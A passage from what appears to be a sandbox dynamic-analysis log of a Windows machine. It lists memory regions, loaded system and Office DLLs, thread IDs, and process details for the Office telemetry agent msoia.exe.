"private_0x000007fffffa4000" filename = "" Region: id = 3970 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 3971 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3972 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3973 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3974 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3975 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3976 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3977 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 4188 start_va = 0x2460000 end_va = 0x246bfff entry_point = 0x2460000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 4189 start_va = 0x2480000 end_va = 0x2487fff entry_point = 0x2480000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 4190 start_va = 0x2490000 end_va = 0x249ffff entry_point = 0x2490000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 4191 start_va = 0x24a0000 end_va = 0x24a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024a0000" filename = "" Region: id = 4192 start_va = 0x24b0000 end_va = 0x24b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 4193 start_va = 0x3880000 end_va = 0x388ffff entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 4194 start_va = 0x3890000 end_va = 0x390ffff entry_point = 0x0 region_type = private name = "private_0x0000000003890000" filename = "" Region: id = 4195 start_va = 0x3a90000 end_va = 0x3b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a90000" filename = "" Region: id = 4196 start_va = 0x3bb0000 end_va = 0x3caffff entry_point = 0x0 region_type = private name = "private_0x0000000003bb0000" filename = "" Region: id = 4197 start_va = 0x3d60000 end_va = 0x3e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d60000" filename = "" Region: id = 4198 start_va = 0x3e60000 end_va = 0x405ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 4199 start_va = 0x4220000 end_va = 0x429ffff entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 4200 start_va = 0x4370000 end_va = 0x446ffff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 4201 start_va = 0x4540000 end_va = 0x463ffff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 4202 start_va = 0x4640000 end_va = 0x4a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 4203 start_va = 0x7fef46b0000 end_va = 0x7fef46cbfff entry_point = 0x7fef46b0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 4204 start_va = 0x7fef46d0000 end_va = 0x7fef4731fff entry_point = 0x7fef46d0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 4205 start_va = 0x7fef53d0000 end_va = 0x7fef53d7fff entry_point = 0x7fef53d0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4206 start_va = 0x7fefae40000 end_va = 0x7fefae48fff entry_point = 0x7fefae40000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 4207 start_va = 0x7fefae80000 end_va = 0x7fefaed2fff entry_point = 0x7fefae80000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4208 start_va = 0x7fefb5b0000 end_va = 0x7fefb5c0fff entry_point = 0x7fefb5b0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 4209 start_va = 0x7fefc7c0000 end_va = 0x7fefc7c6fff entry_point = 0x7fefc7c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4210 start_va = 0x7fefc8b0000 end_va = 0x7fefc8cafff entry_point = 0x7fefc8b0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4211 start_va = 0x7fefca60000 end_va = 0x7fefcaabfff entry_point = 0x7fefca60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4212 start_va = 0x7fefcbb0000 end_va = 0x7fefcc06fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 4213 start_va = 0x7fefcc40000 end_va = 0x7fefcc9afff entry_point = 0x7fefcc40000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4214 start_va = 0x7fefcdb0000 end_va = 0x7fefcdb6fff entry_point = 0x7fefcdb0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4215 start_va = 0x7fefcdc0000 end_va = 0x7fefce14fff entry_point = 0x7fefcdc0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4216 start_va = 0x7fefcf90000 end_va = 0x7fefcfb1fff entry_point = 0x7fefcf90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4217 start_va = 0x7fefcfc0000 end_va = 0x7fefd00dfff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4218 start_va = 0x7fefd8c0000 end_va = 0x7fefd8f5fff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4219 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 4220 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4221 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4222 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4223 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 4228 start_va = 0x7fefb9e0000 end_va = 0x7fefba14fff entry_point = 0x7fefb9e0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Thread: id = 208 os_tid = 0x3bc [0154.768] CreateWellKnownSid (WellKnownSidType=0xb, DomainSid=0x0, pSid=0x12f290, cbSid=0x12f280) Thread: id = 217 os_tid = 0x3c0 Thread: id = 218 os_tid = 0x7dc Thread: id = 220 os_tid = 0x8e4 Thread: id = 222 os_tid = 0x6ac Thread: id = 225 os_tid = 0x684 Thread: id = 226 os_tid = 0x930 Thread: id = 243 os_tid = 0x474 Thread: id = 244 os_tid = 0x704 Thread: id = 247 os_tid = 0x928 Thread: id = 248 os_tid = 0x90c Thread: id = 253 os_tid = 0x3fc Thread: id = 254 os_tid = 0x6d8 Thread: id = 255 os_tid = 0xa00 Thread: id = 300 os_tid = 0x2b0 Thread: id = 303 os_tid = 0xb08 Process: id = "31" image_name = "msoia.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\msoia.exe" page_root = "0x453c5000" os_pid = "0x888" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0xb8c" cmd_line = "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe\" scan upload mininterval:2880" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3380 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3381 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3382 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3383 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3384 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3385 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3386 start_va = 0x13f350000 end_va = 0x13f691fff entry_point = 0x13f350000 region_type = mapped_file name = "msoia.exe" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msoia.exe" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msoia.exe") Region: id = 3387 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3388 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3389 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3390 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3391 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3392 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3393 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3394 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 3395 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3396 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3397 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 3398 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3399 start_va = 0x500000 end_va = 0x687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 3400 start_va = 0x690000 end_va = 0x810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 3401 start_va = 0x820000 end_va = 0x1c1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 3402 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3403 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3404 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3405 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3406 start_va = 0x7fef79d0000 end_va = 0x7fef7bb9fff entry_point = 0x7fef79d0000 region_type = mapped_file name = "c2r64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll") Region: id = 3407 start_va = 0x7fef7bc0000 end_va = 0x7fef7df9fff entry_point = 0x7fef7bc0000 region_type = mapped_file name = "appvisvsubsystems64.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll") Region: id = 3408 start_va = 0x7fef9d20000 end_va = 0x7fef9d22fff entry_point = 0x7fef9d20000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 3409 start_va = 0x7fef9d30000 end_va = 0x7fef9d32fff entry_point = 0x7fef9d30000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 3410 start_va = 0x7fef9d40000 end_va = 0x7fef9d42fff entry_point = 0x7fef9d40000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 3411 start_va = 0x7fef9d50000 end_va = 0x7fef9d52fff entry_point = 0x7fef9d50000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 3412 start_va = 0x7fef9d60000 end_va = 0x7fef9d64fff entry_point = 0x7fef9d60000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 3413 start_va = 0x7fef9d70000 end_va = 0x7fef9d74fff entry_point = 0x7fef9d70000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 3414 start_va = 0x7fef9d80000 end_va = 0x7fef9d82fff entry_point = 0x7fef9d80000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 3415 start_va = 0x7fef9d90000 end_va = 0x7fef9e2bfff entry_point = 0x7fef9d90000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 3416 start_va = 0x7fef9e30000 end_va = 0x7fef9e33fff entry_point = 0x7fef9e30000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 3417 start_va = 0x7fef9e40000 end_va = 0x7fef9e43fff entry_point = 0x7fef9e40000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 3418 start_va = 0x7fef9e50000 end_va = 0x7fef9e52fff entry_point = 0x7fef9e50000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 3419 start_va = 0x7fef9e60000 end_va = 0x7fef9e63fff entry_point = 0x7fef9e60000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 3420 start_va = 0x7fef9e70000 end_va = 0x7fef9e72fff entry_point = 0x7fef9e70000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 3421 start_va = 0x7fef9e80000 end_va = 0x7fef9e82fff entry_point = 0x7fef9e80000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 3422 start_va = 0x7fef9e90000 end_va = 0x7fef9e92fff entry_point = 0x7fef9e90000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3423 start_va = 0x7fef9ea0000 end_va = 0x7fef9ea2fff entry_point = 0x7fef9ea0000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 3424 start_va = 0x7fef9eb0000 end_va = 0x7fef9eb2fff entry_point = 0x7fef9eb0000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 3425 start_va = 0x7fef9ec0000 end_va = 0x7fef9ec2fff entry_point = 0x7fef9ec0000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 3426 start_va = 0x7fef9ed0000 end_va = 0x7fef9fc1fff entry_point = 0x7fef9ed0000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3427 start_va = 0x7fef9fd0000 end_va = 0x7fef9fd3fff entry_point = 0x7fef9fd0000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 3428 start_va = 0x7fef9fe0000 end_va = 0x7fef9ff5fff entry_point = 0x7fef9fe0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 3429 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3430 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3431 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3432 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3433 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3434 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3435 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3436 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3437 start_va = 0x7fefde50000 end_va = 0x7fefebd7fff entry_point = 0x7fefde50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3438 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3439 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3440 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3441 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3442 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3443 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3444 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3523 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3524 start_va = 0xe0000 end_va = 0xe6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3525 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 3526 start_va = 0x1c20000 end_va = 0x1eeefff entry_point = 0x1c20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3527 start_va = 0x1ef0000 end_va = 0x22e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 3528 start_va = 0x37620000 end_va = 0x3762ffff entry_point = 0x0 region_type = private name = "private_0x0000000037620000" filename = "" Region: id = 3529 start_va = 0x7febd6d0000 end_va = 0x7febd6dffff entry_point = 0x0 region_type = private name = "private_0x000007febd6d0000" filename = "" Region: id = 3703 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3704 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 3705 start_va = 0x7fef9a00000 end_va = 0x7fef9d15fff entry_point = 0x7fef9a00000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 3706 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3707 start_va = 0x230000 end_va = 0x2acfff entry_point = 0x230000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3708 start_va = 0x22f0000 end_va = 0x23effff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 3709 start_va = 0x7fef97e0000 end_va = 0x7fef99fcfff entry_point = 0x7fef97e0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 3710 start_va = 0x230000 end_va = 0x2acfff entry_point = 0x230000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3711 start_va = 0x7fefbe50000 end_va = 0x7fefbea5fff entry_point = 0x7fefbe50000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3712 start_va = 0x23f0000 end_va = 0x24fffff entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 3713 start_va = 0x2500000 end_va = 0x25defff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002500000" filename = "" Region: id = 3714 start_va = 0x26a0000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 3715 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 